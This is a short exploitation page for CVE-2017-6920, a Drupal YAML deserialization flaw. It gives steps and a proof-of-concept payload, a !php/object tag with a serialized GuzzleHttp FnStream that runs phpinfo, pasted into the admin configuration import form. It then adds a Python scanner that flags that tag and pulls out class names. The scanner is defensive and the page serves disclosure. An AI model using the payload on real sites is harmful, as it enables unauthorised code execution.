CVE-2017-6920 Drupal YAML Deserialization Code Execution Vulnerability

From PwnWiki

Exploitation

Log in with an administrator account and visit the following URL:

http://127.0.0.1/admin/config/development/configuration/single/import

Set Configuration type to Simple configuration.

Configuration name can be anything. In Paste your configuration here, enter the PoC:

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

Click the Import button at the bottom left to trigger the vulnerability.
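The PoC above depends on the `!php/object` YAML tag reaching the parser, so pasted or stored configuration can be screened for that tag before import. The following is an added example, not code from the original page or from Drupal; the function names `scan_config` and `is_safe_to_import` and the sample class `Acme\Demo\Widget` are assumptions made for illustration. It is a text-level check, so it also flags the tag when it appears inside an ordinary quoted string.

```python
import re

# The PHP-object tag as the PoC uses it, plus the YAML verbatim form !<!php/object>.
TAG_RE = re.compile(r'!(?:<!)?php/object\b')
# Class name in a PHP serialized object: O:<len>:"<class>": or C:<len>:"<class>":
# The optional backslashes cover quotes escaped inside a YAML double-quoted scalar.
CLASS_RE = re.compile(r'\b[OC]:\d+:\\?"([A-Za-z_][A-Za-z0-9_\\]*?)\\?":')

# Constructed sample input (hypothetical class, not taken from a real site).
SAMPLE = r'''
# constructed sample configuration
langcode: en
# a comment mentioning !php/object is not a tag
widget: !php/object "O:16:\"Acme\\Demo\\Widget\":0:{}"
name: plain value
'''


def scan_config(yaml_text):
    """Return [(line_number, [class names])] for each line carrying the tag."""
    findings = []
    for number, line in enumerate(yaml_text.splitlines(), start=1):
        if line.lstrip().startswith('#'):
            continue  # whole-line YAML comment, the tag is inert here
        if not TAG_RE.search(line):
            continue
        # Collapse the doubled backslashes of the YAML escaping for reporting.
        # Class names are only extracted when the payload is on the same line.
        classes = [c.replace('\\\\', '\\') for c in CLASS_RE.findall(line)]
        findings.append((number, classes))
    return findings


def is_safe_to_import(yaml_text):
    """True when no PHP-object tag was found anywhere in the text."""
    return not scan_config(yaml_text)


if __name__ == "__main__":
    for number, classes in scan_config(SAMPLE):
        print(f"line {number}: !php/object tag, classes: {classes or 'unknown'}")
```

The extracted class names help triage: a serialized class with a destructor or other magic method, such as the `GuzzleHttp\Psr7\FnStream` in the PoC, is what turns deserialization into code execution.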